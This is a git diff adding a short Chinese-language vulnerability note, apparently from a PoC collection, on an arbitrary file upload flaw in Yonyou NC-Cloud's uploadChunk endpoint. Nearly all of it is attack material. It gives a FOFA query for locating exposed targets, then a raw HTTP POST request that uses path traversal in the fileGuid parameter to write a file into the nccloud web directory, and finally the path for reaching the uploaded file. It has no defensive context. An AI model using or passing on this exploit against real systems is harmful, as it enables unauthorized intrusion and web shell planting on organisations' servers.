diff --git a/用友NC-Cloud uploadChunk 任意文件上传漏洞.md b/用友NC-Cloud uploadChunk 任意文件上传漏洞.md
new file mode 100644
index 0000000..4894175
--- /dev/null
+++ b/用友NC-Cloud uploadChunk 任意文件上传漏洞.md	
@@ -0,0 +1,21 @@
+## 用友NC-Cloud uploadChunk 任意文件上传漏洞
+
+## fofa
+```
+app="用友-NC-Cloud"
+```
+
+
+## POC
+```
+POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
+Host: {{Hostname}}
+Content-Type: multipart/form-data;
+Content-Disposition: form-data; name="file"; filename="test.txt"
+{{randstr}}
+--024ff46f71634a1c9bf8ec5820c26fa9--
+
+```
+
+文件上传路径访问
+/nccloud/test.txt